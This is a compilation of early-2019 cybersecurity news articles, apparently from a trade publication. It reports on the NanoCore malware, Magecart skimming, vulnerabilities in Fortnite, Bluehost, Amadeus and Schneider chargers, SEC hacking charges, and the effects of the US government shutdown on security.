A malicious MS Word document, titled “eml_-_PO20180921.doc,” has been found in the wild, and according to researchers at Fortinet's FortiGuard Labs, the document contains auto-executable malicious VBA code.
Victims who receive and open the document are prompted with a security warning that macros have been disable. If the user then clicks on “enable content,” the NanoCore remote access Trojan (RAT) software is installed on the victim’s Windows system.
According to FortiGuard Labs, the NanoCore RAT was developed in the .Net framework back in 2013. Despite its continued use, the author was convicted by the FBI and sentenced to nearly three years in prison. Researchers captured a sample of this latest version (126.96.36.199), which uses NanoCore to execute malicious behavior.
Spreading through phishing campaigns that dupe victims into opening the document, the malware is downloaded from www.wwpdubai.com. Once executed, the VBA code downloads and saves an EXE file from the URL.
“I loaded CUVJN.exe with the .Net debugger dnSpy. Tracing from its main function, we can see that it loads numerous data blocks from its resource section, and then puts them together and decrypts them,” wrote researcher Xiaopeng Zhang.
In order to trace the main functions, researchers loaded CUVJN.exe with the .Net debugger dnSpy and found that it loads, puts together and then decrypts multiple data blocks from its resource section in order to get to a new PE file.
“According to my analysis, the decrypted .Net program is a daemon process. Let’s continue to trace it from its main() function. At first, it creates a Mutex and checks if the process already exists to ensure only one process of this program is running. Next, it checks if Avast is running on the victim’s system by detecting whether the “snxhk.dll” module is loaded or not. If so, it keeps waiting until it has been unloaded. Avast is an AntiVirus software, and “snxhk.dll” is one of its modules,” Zhang wrote.
Unfortunately, .dll is a daemon process, which Zhang said he was not able to kill because it has a “ProtectMe” class, though he does provide steps for removing the malware.
Players who love to indulge in online battle should heed caution when playing Fortnite, according to researchers at Check Point who have disclosed vulnerabilities that could give a malicious actor access to a user’s account and their V-Bucks.
In addition to gaining full access to a user’s account, an attacker who exploited the vulnerability – which has now been fixed – could have eavesdropped on a player’s in-game conversations, potentially also picking up any sounds in the background where the game was being played, researchers said.
According to today’s press release, an attacker could have stolen login credentials by exploiting three flaws found in the web infrastructure of Epic Games, specifically in compromised sub-domains through which the malicious actor could intercept authentication tokens.
The attack, which reportedly could be executed in a single click, would grant an attacker the ability to purchase virtual in-game currency using the victim’s payment card details and then be sold for real money outside the game.
“Researchers were able to demonstrate the token-based authentication process used in conjunction with Single Sign-On (SSO) systems such as Facebook, Google and Xbox” and reported the vulnerability to Epic Games, the press release stated.
“Fortnite is one of the most popular games played mainly by kids. These flaws provided the ability for a massive invasion of privacy,” said Oded Vanunu, head of products vulnerability research for Check Point in a press release.
“Together with the vulnerabilities we recently found in the platforms used by drone manufacturer DJI, show how susceptible cloud applications are to attacks and breaches. These platforms are being increasingly targeted by hackers because of the huge amounts of sensitive customer data they hold. Enforcing two-factor authentication could mitigate this account takeover vulnerability,” continued Vanunu.
Still, Check Point advised players to remain vigilant and use discretion when sharing information online and cautioned that because of the increasing popularity and success of phishing campaigns, players should keep in mind that there are many dubious and dangerous links that should not be trusted.
Two security researchers working independently on different projects have discovered multiple vulnerabilities that affect multiple web hosting platforms, including the popular Bluehost, as well as Amadeus, the online reservation system used by several different airlines.
According to independent security researcher Paulos Yibelo, Bluehost, a popular web hosting platform, was riddled with vulnerabilities, including one that would allow complete account takeover.
Rated as having a high severity, the vulnerabilities grant attackers access to personally identifiable information, partial payment information and tokens that grant access to sites like WordPress, Website Planet wrote. In addition to those bugs discovered in BlueHost, Yibelo also reported several bugs in other web hosting platforms, including Dreamhost, HostGator, OVH, and iPage.
“This should serve as a warning call for those companies authenticating customers online with legacy technology. Today, account takeover is not a hard attack to deploy, and the consequences can be devastating with bad actors stealing money and products,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.
In related news, security researcher Noam Rotem, who was working with Safety Detective research lab, discovered a major vulnerability in Amadeus, an online booking system used by nearly half (44%) of all airlines worldwide, including United Airlines, Lufthansa, Air Canada, and many more, according to a January 15 blog post.
After receiving a message to check the passenger name record (PNR), the researchers were able to view any PNR and access customer data.
“With the PNR and customer name at our disposal, we were able to log into ELAL’s customer portal and make changes, claim frequent flyer miles to a personal account, assign seats and meals, and update the customer’s email and phone number, which could then be used to cancel/change flight reservation via customer service,” the researchers wrote.
A malicious actor would need to have a working knowledge of the PNR code in order to exploit the vulnerability, which has since been fixed.
Researchers have uncovered a twelvth Magecart group using tried-and-tested methods to disseminate the digital skimming code by infecting the supply chain.
RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.
This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.
This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.
“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.
“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”
RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.
This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.
Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.
Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.
Two Ukrainian nationals have been charged with hacking into the Securities and Exchange Commission (SEC) and stealing sensitive information for use in insider trading.
Artem Radchenko, 27, and Oleksandr Ieremenko, 26, both from Kiev, were charged with 16 counts including securities fraud conspiracy, wire fraud conspiracy, computer fraud conspiracy, wire fraud and computer fraud.
They’re alleged to have targeted the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, which stores documents related to company disclosures including test filings made before announcements go public.
These filings often contain information similar to that of the official final filing, meaning the two alleged hackers could get their hands on sensitive info before it went public to gain an advantage on the markets.
They’re alleged to have used a variety of tactics to obtain unauthorized access to the EDGAR servers, including directory traversal, phishing and malware. They’re then said to have copied the information to a server in Lithuania.
The Ukrainians recruited traders to their scheme, who used the stolen information to make over $4m in profits, according to the Department of Justice.
For example, they’re alleged to have bought up $2.4m worth of shares in a public company based on information contained in a stolen test filing about its upcoming financials. They then sold these shares for a $270,000 profit over the next day after the company announced it expected record earnings for 2016.
“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said assistant attorney general Brian Benczkowski. “The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”
The charges carry a potential maximum sentence of 25 years behind bars and $500,000 fine, or twice the gain or loss from the relevant offenses.
Ieremenko has been in trouble before, charged in 2015 for his part in an international conspiracy to hack and steal non-public sensitive market information from three newswire organizations, using the same techniques.
A total of 10 defendants have been charged as part of the latest conspiracy.
The UK’s National Cyber Security Centre (NCSC) has urged organizations still on Windows 7 to plan now for the end of extended support in a year’s time.
The GCHQ arm reminded IT managers that the operating system will no longer receive free updates from January 14 2020.
That will mean any machines still running then could be exposed to a greater risk of malware, and potentially unreliable systems.
The NCSC drew parallels with the end-of-support for Windows XP in 2014.
“It wasn’t long after that before exploitation of the final version of the platform became fairly widespread. Malware can spread much more easily on obsolete platforms because, without security updates, known vulnerabilities will remain unpatched. As a result, it’s crucial to move away from them as quickly as possible,” it explained.
“We know there are costs involved in keeping up to date. However, doing so is one of the most effective ways of keeping your networks and devices secure - this is why planning your upgrades far in advance is especially important.”
For organizations unable for any reason to migrate swiftly to Windows 10 — for example if there are compatibility issues with legacy software — the NCSC has listed a few key short-term recommendations.
These include preventing access to untrusted services and removable media, converting systems to thin clients, removing access for remote workers and applying anti-malware and intrusion detection tools.
For those businesses keen to remain on Windows 7 beyond January 14 2020, Microsoft is also offering Extended Security Updates (ESUs) which will be costed per device and increase in costs every year until January 2023.
Another option is to buy the Windows Virtual Desktop service, virtualizing Windows 7 on Azure VMs. This option comes with free ESUs but will also be available only for three years.
Despite the burgeoning IoT market, organizations made limited progress on IoT security in 2018, according to a new report from Gemalto. Though there is evidence of incremental improvements, security measures are being outpaced by the rapid growth of IoT, which is on track to hit 20 billion devices by 2023.
The survey queried 950 IT and business decision-makers with awareness of IoT in their organization in 2018. Of those, only 48% of companies said that they have the ability to detect whether their IoT devices have suffered a breach; however, 90% of respondents believe that security is a major concern for their customers.
According to the report, more than half (54%) of consumers fear that their privacy may be compromised with IoT devices, yet only 14% of the survey participants see protecting customer privacy by security IoT devices as an ethical responsibility.
“Given the increase in the number of IoT-enabled devices, it’s extremely worrying to see that businesses still can’t detect if they have been breached,” said Jason Hart, CTO, data protection at Gemalto, in a press release. “With no consistent regulation guiding the industry, it’s no surprise the threats – and, in turn, vulnerability of businesses – are increasing. This will only continue unless governments step in now to help industry avoid losing control.”
More than a third (38%) of participants said they experience privacy challenges associated with collecting large amounts of IoT data. Still, more organizations have started using passwords to protect IoT devices. While 63% of organizations said they used passwords in 2017, the number of positive responses rose to 66% in 2018.
Businesses are clearly feeling the pressure of protecting the growing amount of data they collect and store,” Hart said. “But while it’s positive they are attempting to address that by investing in more security, such as blockchain, they need direct guidance to ensure they’re not leaving themselves exposed. In order to get this, businesses need to be putting more pressure on the government to act, as it is them that will be hit if they suffer a breach.”
Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.
“The first step in addressing the issue, was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”
As has been the alternative method of communication for many organizations that have been impacted by cyber-attacks, Del Rio turned to social media, using Facebook to inform citizens of alternative payment options available to them.
After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.
At the time of writing this, the website for the city of Del Rio was up and running, though there is no word on the full scope of the attack. Infosecurity has contacted the city, and this story will be updated with any response.
“The growing number of exploit kits and malware at their disposal is emboldening malicious actors to attack organizations with a rich trove of consumer data,” said Mike Bittner, digital security and operations manager at The Media Trust.
“Government organizations, in particular city governments, are prime targets; they not only process a lot of citizen and business data but are also less secure as tighter budgets severely limit what IT updates they can carry out. Bad actors have no doubt put the 89,000 local governments across the country in their cross hairs. It is just a matter of time before many of these governments realize they’ve been hacked.”
As the US inches toward a full month of a government shutdown, concerns over the impact on national security and cybersecurity continue to mount, and according to security experts from Juniper Networks, Untangle and Vectra, the shutdown may affect government IT recruiting and hiring.
With the skills gap being one of the hurdles every company must clear in order to mature in their overall cybersecurity posture, most organizations are trying to get more creative when it comes to recruitment. The government, though, is in its 25th day of a shutdown.
“The biggest impact of the shutdown, in my opinion, is that furloughing cybersecurity analysts creates a vulnerability for government networks. As we all know, the top problem in security today is the shortage of trained cybersecurity professionals, and the cybersecurity skills shortage was already getting worse in 2018 with millions of unfilled cybersecurity jobs,” said Nick Bilogorskiy, cybersecurity strategist at Juniper Networks.
The problem is exacerbated because some staff are furloughed with the shutdown As was reported by Infosecurity last week, attackers can potentially intensify their activity and exploit security gaps and vulnerabilities resulting from the shutdown. When considering the long-term ramifications, Bilogorskiy said it’s likely that the government will lose valuable cybersecurity talent to the private sector.
“During prior shutdowns, recruiting and hiring efforts have certainly been impacted, as these are not typically considered essential functions,” said Dave Mihelcic, federal chief technology and strategy officer for Juniper Networks and former chief technology officer of Defense Information Systems Agency (DISA).
“Perhaps the more significant challenge posed by these shutdowns was the lasting impressions they made on young IT professionals," Mihelcic continued. "Undoubtedly IT job seekers had a more negative view of federal employment due to the shutdown. Likewise the most talented IT professionals in federal service were left with lasting questions about their future that would cause some to seek outside opportunities.”
The problem isn't limited in scope, either. Yes, expired certificates are a problem, but collaboration between the public and private sector is critical to strong cyber-defense. "With only a skeleton crew at the helm, data sharing and rapid response can fall by the wayside, leaving our nation vulnerable to cyber threats and attacks. The longer the shutdown continues, the more opportunity there is for both private and state-sponsored attackers to take advantage of any possible lapses in oversight,” said Heather Paunet, vice president of product management at Untangle.
Government agencies have often lost potential talent to the salary battle with private industry, but the biggest concern of the government shutdown is that this type of instability would hamper the federal government’s ability to attract and retain good cybersecurity talent, according to Chris Morales, head of security analytics at Vectra.
"With the number of available roles in the private sector that pay with much more lucrative salaries and benefits, it’s going to just get harder for government agencies to compete. If anyone is in need of more automation and efficiency in security operations processes, it will be these federal agencies.”
Two major UK high street banks have started to send out replacement cards for some of their customers, nine months after one lender reported fraudulent activity to Ticketmaster.
Customers of NatWest and RBS have taken to social media to vent their frustration over the way the incident has been handled.
Some complained that this is the first they’ve heard of the breach, which Ticketmaster reported in June and is believed to have affected in the region of 40,000 UK customers.
Others wanted to know if the letter sent by their bank was genuine.
“During 2018 Ticketmaster announced that they suffered a data breach between September 2017 and June 2018, which included data for some of our customers because of this we are replacing all customer debit and credit cards that may have been compromised by this breach,” explained a Twitter response to one such query by NatWest.
The banks claim they are issuing the replacement cards as a precaution, so there’s no confirmation that details were definitely accessed in the incident.
However, the lengthy delay in responding to the breach comes in stark contrast to banking start-up Monzo which requested Mastercard to issue replacement cards for all affected customers back in April last year.
In fact, the bank wrote in a blog post that it had initially contacted the ticketing giant to inform it of a potential breach, a warning that appeared to have gone unheeded for nearly two months.
Breaches are often first detected by banks as they’re able to analyze fraud patterns on customer cards to pinpoint a merchant they have in common.
The breach itself was the result of digital skimming code known as Magecart being seeded into software provided by a third-party developer Inbenta Technologies.
The latter claimed that Ticketmaster had implemented it incorrectly on its payments page.
“We were unaware of this, and would have advised against doing so had we known, as it presents a point of vulnerability,” it said at the time.
It’s unclear how many RBS and NatWest customers have experienced fraud as a result of the Ticketmaster breach, although card details from other Magecart breaches at BA and Newegg were spotted for sale on dark web sites just a week later.
This would seem to highlight the need for a speedy response from all parties in such cases, including the breached firm and relevant banks/card providers.
Many organizations may find they’re better off hiring pen testers and in-house security researchers directly than running bug bounty programs, according to new MIT research.
The New Solutions for Cybersecurity paper features a surprising analysis of bug bounty programs in the chapter, Fixing a Hole: The Labor Market for Bugs.
It studied 61 HackerOne bounty programs over 23 months — including those run for Twitter, Coinbase, Square and other big names — and one Facebook program over 45 months.
It claimed that, contrary to industry hype, organizations running these programs don’t benefit from a large pool of white hats probing their products. Instead, an elite few produce the biggest volume and highest quality of bug reports across multiple products, earning the biggest slice of available rewards.
It’s also claimed that even these elite “top 1%” ethical hackers can’t make a decent wage by Western standards.
The top seven participants in the Facebook program studied made just $34,255 per year from an average of 0.87 bugs per month, while from the HackerOne dataset it was estimated that they made just $16,544 from 1.17 bugs per month.
There are, of course, exceptions: last week we reported that one company has upped its maximum payout for iOS zero-day exploits to $2m. However, it appears that these programs offer more of a salary top-up to Western researchers than a main source of income.
Security research firm Trail of Bits claimed the findings proved that firms should reconsider their security strategies by hiring “boffins” directly as consultants instead of running bug bounty programs.
“The authors of Fixing a Hole argue that bug bounties should be designed to incentivize the elite. They say that making bounties invite-only lowers the operational cost of managing a tsunami of trivial, non-issue, and duplicate bugs. Only 4-5% of bugs from Google, Facebook, and GitHub’s public-facing bounty programs were eligible for payment,” it argued in a blog post.
“According to the authors, a small number of bounty hunters are indispensable and hold significant power to shape the market for bug bounty programs. Based on this, hiring security consultants under terms and conditions that can be controlled seems more practical.”
That view is unsurprisingly not shared by HackerOne CEO, Marten Mickos, who said the MIT study is not representative.
“If it is based on HackerOne data, it is only based only on a fragment of it. The hacker community is indeed power-law distributed,” he added in comments sent to Infosecurity.
“The top performers are orders of magnitude more productive than newcomers. The beauty is that many newcomers rise very quickly in the ranks. Within this merit-based system, there is unlimited opportunity for one with skill and will."
Report co-author and CEO of Luta Security, Katie Moussouris, doubled down on the findings, claiming that independent researchers are “better off pen testing or living the good life of in-house research staff.”
“Orgs can't #bugbounty their way to secure, same as they can't pen test their way to secure,” she tweeted. “The myth of ‘many eyes’ is convenient, but untrue as proven in both open source & bounties. Skilled bug bounty hunters rarely make a good living by Western standards.”
The Polish government is reportedly considering a ban of the use of Huawei products by the public sector following the arrest of an employee of the firm on suspicion of espionage.
Country sales director, Wang Weijing, was arrested on Friday along with a former Polish official who was apparently responsible for issuing security certificates for government IT equipment.
Huawei has sought to distance itself from the spying allegations by sacking Wang. The firm has said in a statement that the individual had brought the Shenzhen giant into disrepute, but that at the same time his alleged actions “have no relation to the company.”
With national security concerns over Chinese firms growing in the West, Warsaw could be inclined to join others in cooling its relationship with the world’s biggest telecoms equipment maker.
A senior government official told Reuters it was considering a public sector ban on Huawei alongside possible legislation which could allow restrictions to be placed on firms posing a national security threat.
Cybersecurity minister, Karol Okonski, told the news site: “We will analyze whether ... our decision can include an end to the use ... of Huawei products.”
“We do not have the legal means to force private companies or citizens to stop using any IT company’s products,” he added. “It cannot be ruled out that we will consider legislative changes that would allow such a move.”
Although the firm has repeatedly hit back at claims it is a security risk, stating it is a victim of wider geopolitical tensions, the US and Australia have effectively banned its equipment from their 5G networks while New Zealand and Canada are mooting the same.
Japan has said it will prevent the firm from competing for government contracts.
In the UK, the firm has pledged $2bn to allay recently aired security concerns about vulnerabilities in its products, although its equipment will still be used in BT’s 5G edge networks. There’s also the possibility that the government will go further.
“We need to decide the extent to which we are going to be comfortable with Chinese ownership of these technologies and these platforms in an environment where some of our allies have taken a very definite position,” MI6 chief Alex Younger has said.
Three different vulnerabilities in the Schneider Electric EVlink Parking electric vehicle charging station, which could have allowed an attacker to halt the charging process, have been patched, according to Positive Technologies.
Researchers discovered the vulnerabilities, CVE-2018-7800, CVE-2018-7801 and CVE-2018-7802, in charging stations used at parking environments in several countries, including at offices, hotels, supermarkets, fleets and municipals. The vulnerabilities reportedly affect EVLink Parking v3.2.0-12_v1 and earlier.
“Schneider Electric products are widely used in countries all over the world where the electric vehicle industry is developing. Exploitation of these vulnerabilities may lead to serious consequences,” says Paolo Emiliani, industry and SCADA research analyst at Positive Technologies said in a press release. “Attackers can actually block electric car charging and cause serious damage to the energy industry.”
According to today's news post, if exploited, the vulnerabilities would enable cyber-criminals to stop the charging process for vehicles plugged into the affected stations, as well as unlock and steal the charging cables.
Specifically, CVE-2018-7800 and CVE-2018-7802 gave attackers privileged access to the charging station so that a hacker could “stop the charging process, switch the device to the reservation mode, which would render it inaccessible to any customer until reservation mode is turned off, and even unlock the cable during the charging by manipulating the socket locking hatch, meaning attackers could walk away with the cable.”
In addition, exploitation of the second vulnerability enabled access to the web-interface, where an attacker could directly manage the operating system and make changes to files and configurations or add new users or back doors.
Schneider stated that customers can set up a firewall to block remote/external access except by authorized users as a risk mitigation strategy and recommended several cybersecurity best practices, including locating control and safety system networks and remote devices behind firewalls, and keeping those isolated from the business network.
“Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices,” the security notification stated.
After news that a bug in its software resulted in a data breach, Singapore Airlines (SIA) has today issued a warning on Facebook, alerting customers to be wary of scams and phishing sites promising free airline tickets.
In what the company called a fraudulent online survey being dispersed via WhatsApp, scammers ask users if they have ever traveled with the airline and make the specious claim that SIA is offering free tickets in celebration of its anniversary.
In truth the survey is a scam attempting to trick SIA customers into giving their personal and credit card information. “If a recipient answers the survey questions and click on ... 'Claim Tickets' or 'WhatsApp,' user will be redirected to a non-SIA website that is designed to trick the recipients into filling in their personal and credit card information. This fraudulent website is only accessible via mobile device browsers. They are shared and forwarded via WhatsApp,” SIA wrote.
In addition, the company is using social media to reach its customers as well. “It has come to our attention that there is a website that claims to be from Singapore Airlines, offering free air tickets as prizes, before proceeding to request personal data,” Singapore Airlines wrote on Facebook.
“We have reported the site to be taken down and would like to advise customers to exercise discretion when revealing personal data to unverified sources. These websites, emails and calls should be verified if in doubt. Please send us details on our social media channels or via this link http://singaporeair.com/en_UK/feedback-enquiry/.
“We would also like to advise customers to be cautious of social media posts and phishing websites that appear similar to our official website singaporeair.com. Thank you.”
Cyber-criminals continue to prey on the naïveté and trust of end users. Already in 2019, Infosecurity has reported on multiple different scams, such as 60% of UK consumers leaving themselves vulnerable to New Year’s resolution online scams and the return of the WhatsApp Gold scam.
Increasingly, though, users are realizing that with all online and mobile ads, nothing is ever really free. One Facebook user warned, “If it sounds/looks to good to be true, it usually is! Always delete these things after checking official websites!”
Crypto-mining malware has again topped the threat index, with Coinhive holding strong in the number one malware threat for the 13th consecutive month, according to the latest Global Threat Index for December 2018, published by Check Point.
The threat index looks at the most common active malware variants and trends as cyber criminals evolve toward crypto-mining and multipurpose malware.
A second-stage downloader, SmokeLoader, first identified back in 2011, jumped to ninth place on the December top-10 list. “After a surge of activity in the Ukraine and Japan, its global impact grew by 20. SmokeLoader is mainly used to load other malware, such as Trickbot Banker, AZORult Infostealer and Panda Banker,” according to a press release.
“December’s report saw SmokeLoader appearing in the top 10 for the first time. Its sudden surge in prevalence reinforces the growing trend towards damaging, multipurpose malware in the Global Threat Index, with the top 10 divided equally between crypto-miners and malware that uses multiple methods to distribute numerous threats,” said Maya Horowitz, threat intelligence and research group manager at Check Point.
“The diversity of the malware in the Index means that it is critical that enterprises employ a multilayered cybersecurity strategy that protects against both established malware families and brand new threats.”
For mobile malware, Triada, a modular backdoor for Android that grants super-user privileges to downloaded malware, ranked number one.
“Check Point researchers also analyzed the most exploited cyber vulnerabilities. Holding on to first place was CVE-2017-7269, whose global impact also rose slightly to 49%, compared to 47% in November. In second place was OpenSSL TLS DTLS Heartbeat Information Disclosure, with a global impact of 42% closely followed by PHPMyAdmin Misconfiguration Code Injection with an impact of 41%,” the press release stated.
Not surprisingly, the report also reflected a rise in banking Trojans, particularly in the data-stealing Trojan, Ramnit, which ranked eighth on the top-10 list.
The British Security Industry Association (BSIA) has published a summary of current guidelines to minimize the exposure to digital sabotage of network connected equipment, software and systems used in electronic security.
The 335 Cyber Secure It - Best Practice Guidelines for Connected Security Systems document, designed by the Cyber Security Product Assurance Group (CySPAG) and leading industry experts, is “intended to be used as a guide by any stakeholder (designers, manufacturers, installers, maintainers, service providers and users) in the supply chain regarding connected security devices/services.”
The guidelines are based on international industry best practice and refer to recognized international guidance and standards that “will assist the supply chain in their duty of care to other network users, particularly with respect to protecting the integrity of existing cybersecurity countermeasures already in place or the implementation of such countermeasures in new solutions.”
Steve Lampett, technical services manager, BSIA, said: “We think that Cyber secure it – Best Practice Guidelines for Connected Security Systems will become an invaluable guide for our industry practitioners and stakeholders alike as technology continues to evolve and the internet is used to provide a better end user experience.
“This will enable us to better serve our industry consumers by providing professional, safe and secure internet enabled security solutions.”
The healthcare sector continues to be the target of cyberattacks, with Managed Health Services (MHS) of Indiana Health Plan announcing recently that a third-party data breach potentially exposed up to 31,000 patients' personal data in one of two security incidents the company has disclosed in the past month.
The organization reportedly manages Indiana's Hoosier Healthwise and Hoosier Care Connect Medicaid programs. “MHS learned from its vendor, LCP Transportation, that unauthorized persons had gained access to some of their employees’ email accounts. This access took place sometime between July 30 and September 7, 2018,” the news release stated.
On October 29, 2018, MHS launched an investigation after learning that protected health information, including names, insurance ID numbers, addresses, dates of birth, dates of service and descriptions of medication conditions, was possibly disclosed.
“The incident was caused by a phishing attack on the vendor’s systems. The vendor immediately took steps to secure the email accounts and began an investigation, including hiring a computer forensic firm to assist. The investigation concluded that some of your information may have been in the email accounts and that could be accessed. There is no evidence that your information has been misused.”
“Phishing attacks are a favorite for malicious adversaries as one of the most successful methods for stealing and exposing data. LCP Transportation, a third-party vendor of Managed Health Services, recently felt the impact of how a phishing attack targeted at their employees can trickle down the chain – ultimately breaching roughly 31,000 patient records held by their business associate,” said Fred Kneip, CEO, CyberGRX.
“To combat this, healthcare providers require a cyber solution that moves beyond previous, static approaches to third-party cyber-risk management that is unable to scale with their growing ecosystems.”
According to Becker’s Hospital Review, this is the fourth data breach impacting health plans disclosed in the past month. Yet another example of the ways in which individuals and their personal data are at the mercy of insecure organizations, the MHS incident follows a reported data breach at Humana and two separate security incident announcements at BCBS of Michigan.
For the second time in less than two months, the New York Times has reported that a progressive group of Democrats allegedly leveraged social media sites in a secret project intended to spread false information and sway the 2017 Senate race in Alabama.
According to the New York Times, “The 'Dry Alabama' campaign, not previously reported, was the stealth creation of progressive Democrats who were out to defeat Mr. Moore – the second such secret effort to be unmasked.”
In December 2018, a technologically savvy group of Alabama Democrats allegedly attempted to mimic tactics used by the Russians, who meddled in the 2016 presidential campaign, according to one of the group's internal reports.
According to The Hill, Matt Osborne, a progressive activist who worked on the Dry Alabama campaign, said Democrats had no choice but to use disinformation if they wanted to level the playing field with Republicans. “If you don’t do it, you’re fighting with one hand tied behind your back,” Osborne reportedly said. “You have a moral imperative to do this – to do whatever it takes.”
The reality is that this was the intentional creation of fake news. "It is akin to having a digital billboard or TV ad with incorrect facts," said Chris Morales, head of security analytics at Vectra. "Since we have been successful using AI to detect attacker behaviors in real time, someone should ask a team of data scientists to find a way to use AI to detect political misinformation, since there seems to be more than an average person can sort through.”
Reportedly a participant in the Alabama project, Jonathon Morgan was chief executive of a small cybersecurity firm New Knowledge.
“First of all, I find it abhorrent that a firm would use 'cybersecurity' as part of its tagline if in fact they were conducting offensive maneuvers to sow disinformation,” said Paul Innella, CEO of Washington DC-based cybersecurity firm TDI.
“Cybersecurity professionals have an ethics code we follow, one which is endorsed when obtaining a number of certifications in our space. While it’s not the Hippocratic Oath, we still hold ourselves to a high standard – cybersecurity is defensive at its core. This is a slippery slope of the highest order if we are going to start using a field whose reputation is built on trust to now pivot to a field of propagating mistrust.”
The proper use of cybersecurity would enable detection of misinformation and impede the progress of spreading this kind of propaganda, Innella continued.
“A cyber task force should be formed that combines the awesome power of our intelligence and justice agencies to combat this ever-present danger. A threat to free and honest speech is a threat to our constitutional rights, one which demands an even more powerful response. We absolutely have the people and the technologies to address this growing danger, our government needs to employ it, diligently, and now.”
A research team of experts from Graz University of Technology, Boston University, NetApp, CrowdStrike, and Intel has published findings on page cache attacks. Unlike Spectre and Meltdown, this attack is a first-of-its-type, hardware-agnostic, side-channel attack that can remotely target operating systems such as Windows and Linux and effectively exfiltrate data, bypassing security precautions.
In explaining the attack, authors wrote: “Our side-channel permits unprivileged monitoring of some memory accesses of other processes, with a spatial resolution of 4KB and a temporal resolution of 2 microseconds on Linux (restricted to 6.7 measurements per second) and 466 nanoseconds on Windows (restricted to 223 measurements per second); this is roughly the same order of magnitude as the current state-of-the-art cache attacks.”
After detailing background information on hardware caches, cache attacks, and software caches, the authors provide an attack threat model in which the researchers “assume that attacker and victim have access to the same operating system page cache. On Linux, we also assume that the attacker has read access to the target page, which may be any page of any attacker-accessible file on the system.”
In addition to mitigation strategies, the researchers also stated that they responsibly disclosed the vulnerability to Microsoft, and the company said it will roll out a fix.
"This attack class presents a significantly lower complexity barrier than previous hardware-based, side-channel attacks and can easily be put into practice by threat actors, both nation-state as well as cyber-gangs,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.
“In particular, password recovery via unprivileged applications is a major worry, as it would be available to most unwanted software bundlers and other programs typically thought of as relatively harmless. There is not much that an end user can currently do to protect themselves against this type of attack except to not run any software from a shady source, even if it does not raise any antivirus flag," said Hahad.
The US government shutdown is having a chilling effect on national cybersecurity, with 80 government web certificates having already expired without being renewed and FBI agents issuing a stark warning.
Vendor Netcraft claimed on Thursday that the lapsed certificates include those affecting “sensitive government payment portals and remote access services” at agencies like NASA, as well as the Department of Justice and the Court of Appeals.
The impact of this administrative snafu is to render the sites inaccessible or insecure. If HSTS is properly implemented, modern browsers will now not allow users to visit sites with expired certificates, said Netcraft.
“However, only a few of the affected .gov sites implement correctly-functioning HSTS policies. Just a handful of the sites appear in the HSTS preload list, and only a small proportion of the rest attempt to set a policy via the Strict-Transport-Security HTTP header — but the latter policies will not be obeyed when they are served alongside an expired certificate, and so will only be effective if the user has already visited the sites before,” it explained.
“Consequently, most of the affected sites will display an interstitial security warning that the user will be able to bypass. This introduces some realistic security concerns, as task-oriented users are more likely to ignore these security warnings, and will therefore render themselves vulnerable to man-in-the-middle attacks.”
The concern is that as the shutdown continues, growing numbers of certificates will expire without being renewed, increasing the security risk.
The National Institute of Standards and Technology (NIST) is particularly badly affected by the shutdown, with an estimated 85% of personnel furloughed and its website shut.
That’s bad news for the information security community as NIST guidance documents and frameworks are widely consulted to improve baseline security practices around the world.
As if that weren't enough, FBI special agents have signed an open letter warning that the shutdown could hurt operations and even force agents to consider roles elsewhere.
"As those on the frontlines in the fight against criminals and terrorists, we urge expediency before financial insecurity compromises national security," they said.
Suzanne Spaulding, a former Department of Homeland Security (DHS) under-secretary and Nozomi Networks advisor, warned that the loss of so many government employees means the US is “losing ground against our adversaries.”
“And the timing couldn’t be worse, with Congress just having established the new Cybersecurity and Infrastructure Security Agency (CISA) at the DHS,” she added.
“Getting this agency fully operational requires a lot of work and it’s like repairing an airplane while you’re flying it. You try to avoid disrupting the critical operational activity even while you make changes to improve the organization. This shutdown is a disruption CISA can ill afford.”
House Democrats have accused Trump of holding the country hostage over an exaggerated threat, as he demands over $5bn to fund a wall on the southern border with Mexico that he originally promised would be paid for by the Latin American nation.
The current shutdown is the longest since 1995, with an estimated 800,000 federal employees expecting not to be paid this week. Most Americans blame the president for the impasse, according to a new poll.